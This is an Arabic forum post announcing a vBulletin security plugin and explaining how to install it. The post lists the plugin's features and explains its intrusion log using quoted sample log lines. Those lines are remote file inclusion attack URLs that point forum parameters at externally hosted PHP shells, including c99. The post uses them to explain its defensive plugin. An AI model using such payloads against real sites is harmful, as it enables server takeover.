إظهار / إخفاء الإعلانات 
عدد الضغطات : 8,672 عدد الضغطات : 10,206 عدد الضغطات : 14,846 عدد الضغطات : 6,789 الديوان الشعري
عدد الضغطات : 8,343
إظهار / إخفاء الإعلانات 
سوالف صورتي
عدد الضغطات : 6,638 اقلام من الجبلان
عدد الضغطات : 13,104 قناة منتدى الجبلان
عدد الضغطات : 6,642 مشاكل وحلول المواقع
عدد الضغطات : 4,485
شخصيات من الجبلان
عدد الضغطات : 8,086 اطلب توقيعك من مصميمي المنتدى
عدد الضغطات : 4,017 عظو بالمطبخ
عدد الضغطات : 4,192 طلبات البرامج
عدد الضغطات : 3,965

.::||[ آخر المشاركات ]||::.
سجل دخولك للمنتدى ببيت شعر [ الكاتب : اخت القمر - آخر الردود : سلطان الجبلي - عدد الردود : 19001 - عدد المشاهدات : 364974 ]       »     قصيدة مؤثرة للمرحوم نهار بن ه... [ الكاتب : فهد عيد الجبلي - آخر الردود : سلطان الجبلي - عدد الردود : 1 - عدد المشاهدات : 2 ]       »     شجرة عائلة العوض من الاعنة من ... [ الكاتب : سلطان الجبلي - آخر الردود : سلطان الجبلي - عدد الردود : 2 - عدد المشاهدات : 3 ]       »     قصة الخثوله مع قوم العصلب العر... [ الكاتب : الخـثل 1 - آخر الردود : سلطان الجبلي - عدد الردود : 1 - عدد المشاهدات : 2 ]       »     عبطان هذي سوات الموت خلوك علوى... [ الكاتب : سلطان الجبلي - آخر الردود : سلطان الجبلي - عدد الردود : 2 - عدد المشاهدات : 3 ]       »     خيطان ديرة الجبلان [ الكاتب : فهد عيد الجبلي - آخر الردود : سلطان الجبلي - عدد الردود : 1 - عدد المشاهدات : 2 ]       »     القاب فرسان مطير [ الكاتب : الخـثل 1 - آخر الردود : سلطان الجبلي - عدد الردود : 1 - عدد المشاهدات : 2 ]       »     فرسان مطير [ الكاتب : الخـثل 1 - آخر الردود : سلطان الجبلي - عدد الردود : 1 - عدد المشاهدات : 2 ]       »     بعض من فرسان مطير [ الكاتب : الخـثل 1 - آخر الردود : سلطان الجبلي - عدد الردود : 1 - عدد المشاهدات : 2 ]       »     فريس ذوي عون [ الكاتب : الخـثل 1 - آخر الردود : سلطان الجبلي - عدد الردود : 1 - عدد المشاهدات : 2 ]       »    



العودة   ::منتدى الجبلان الرسمي:: > الأقســـام التقنيـه > تطوير المواقع والمنتديات
 


 
 
أدوات الموضوع انواع عرض الموضوع
Prev المشاركة السابقة   المشاركة التالية Next
#1  
قديم 08-05-2008, 07:14 PM
::+عضو شرف+::
الشعلي غير متواجد حالياً
Kuwait    
اوسمتي
المصمم المميز 
لوني المفضل Black
 رقم العضوية : 1362
 تاريخ التسجيل : May 2008
 فترة الأقامة : 6427 يوم
 أخر زيارة : 09-05-2013 (09:47 AM)
 المشاركات : 600 [ + ]
 التقييم : 28
 معدل التقييم : الشعلي الخطوة الثانية في طريق التميز
بيانات اضافيه [ + ]
افتراضي هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى




السلام عليكم ورحمة الله وبركاته

اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني


الحماية الكامله i.s.s.w وميزات لاتحصى

عمل الهاك : حماية المنتدى بشكل كامل بعون الله




الحماية الكامله i.s.s.w وميزات لاتحصى

الحماية الكامله i.s.s.w وميزات لاتحصى


الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع


الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

كود PHP:
2007-12-1105:50:441197370244209.67.223.188p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-1106:32:221197372742203.211.135.147t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

2007-12-1107:09:461197374986211.157.108.187p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-1109:15:081197382508200.102.138.66t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) 
الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة

كود PHP:

التاريخ والوقت
كود PHP:
2007-12-1105:50:44


عدد المحاولات
كود PHP:
1197370244 
ايبي الموقع المصااب
كود PHP:
209.67.223.188 

الاصابة طبعا تشفرت لاغراض امنيه
كود PHP:
p=11575//codebb/lang_select 
الاستغلال
كود PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? 
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
كود PHP:
libwww-perl/5.808 


الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v4.0 issw v3

عليه فقط حذف ملف البرودكت

وتركيب المحدث


شرح حذف الهاك


من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

مع
تحيات الفريق الامني

الان من لوحت تحكم المنتدي قم برفع البرودكت


تم تجربت المنتج على الاصدار

3.6.x

3.7.0


لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت

يطرحه هنا في الموضوع لنصل لتطوير اكثر


وجل من لا يخطأ وشكرا لكم


لتتبع جديد الهاك على الرابط التالي

http://www.is-sw.net/index.php?issw=isswvb

الحمد لله على كل شيء

لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق

وشكرا لكم


الفريق الأمني


i.s.s.w team




اضف تعليق على الفيسبوك
تعليقاتكم البناءه هي طريقنا لتقديم خدمات افضل فلا تبخل علينا بتعليق



الملفات المرفقة
نوع الملف: zip i.s.s.w v 4.0.zip‏ (7.4 كيلوبايت, المشاهدات 3)

رد مع اقتباس
 

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 2 ( الأعضاء 0 والزوار 2)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
دورة [[ D3is H4Ck3R ]] طريق الحماية للأجهزة [[ دورة قوية ]] الشعلي الكمبيوتر والبرامج 5 25-10-2008 10:30 PM
عملاق الحماية Norton AntiVirus 2007 + الكيجن + شرح +متوافق مع vista و xp فلاُن الكمبيوتر والبرامج 2 10-07-2007 12:56 PM

RSS RSS 2.0 XML MAP HTML

Bookmark and Share


الساعة الآن 10:48 PM.

أقسام المنتدى

الأقســـام الأدبيــه | الشعر العام | القصص والروايات | الأقسام ألإسرية والصحية | الأسرة و الصحة | فتآفـيت | الأقســـام السياحية | الصور والخلفيآت | الرياضة العربية والعالمية | الأقســـام التقنيـه | الكمبيوتر والبرامج | دروس الفوتوشوب | الأقســـام الأداريــه | الأقسام التاريخية والخاصة في قبيلة مطير | مجلس تاريخ الجبلان | مجلس بلاد ومواطن الجبلان | مجلس أخبار الجبلان | مجلس تاريخ مطير | تطوير المواقع والمنتديات | خاص بالشكاوى الخاصة الموجهة للادارة | مجلس الرحلات البريه والأبل والصقور | مجلس شعراء وقصائد الجبلان | همس القوافي | المواهب الشعريه | مجلس التاريخ العام | الأثاث والديكور | المحاوره الشعريه | مشاكل تسجيل الأعضاء | الخواطر والنثر | الملاحظات والأقتراحات الموجهة للجنة الجبلان | مسابقة شاعر منتدى الجبلان | خاص بالمراقبين | خاص بالاقتراحات والشكاوى ومشاكل تسجيل الاعضاء | يوتيوب الجبلان | السفر والسياحة والعطلات | مجلس انتخابات الكويت | مسابقة مغترة الجبلان للمحاوره | مكتبة الأستايلات | مكتبة السكربتات | مجلس التغطيات الاعلامية واخبار قبيلة مطير | مجلس أنساب الجبلان | مجلس شعراء مطير | مجلس المحاورات الشعرية المنقولة | مجلس أخبار المحاورات و الآمسيات الشعرية | مجلس ديوان الجبلان الشعري | ملحقات الفوتوشوب | مسابقة الشيخ صاهود بن لامي ( رحمه الله ) الشعريه | قسم التسجيل | هواة التصوير Photo | فــريق التطــوير | مجلس تغطية احتفالات ومناسبات الجبلان | مجلس التعازي والمواساة | رحلات أعضاء منتدى الجبلان السياحية | مجلس اللقاءات والاستضافات الاعلامية | مجلس مزاين وهجيج الابل | خاص بفريق الادارة | مونتاج الفيديو و الصوتيات | الأقســـام الشبابية والرياضية | دوري كأس دواوين الجبلان لكرة القدم | الأقسام الانتخابية والسياسية | مجلس انتخابات السعودية | الاقسام الخاصة في الجبلان | لـجنة الـجبلان | التواصل الألكتروني المباشر مع لجنة الجبلان |



Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. , TranZ By Almuhajir
Ads Management Version 3.0.1 by Saeed Al-Atwi

جميع المشاركات المكتوبة تعبّر عن وجهة نظر كاتبها فقط . ولسنا مسؤلين عنها بأي شكل من الأشكال .

Security team

This Forum used Arshfny Mod by islam servant
اختصار الروابط

تصميم الابداع الرقمي
تصميم الابداع الرقمي  
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64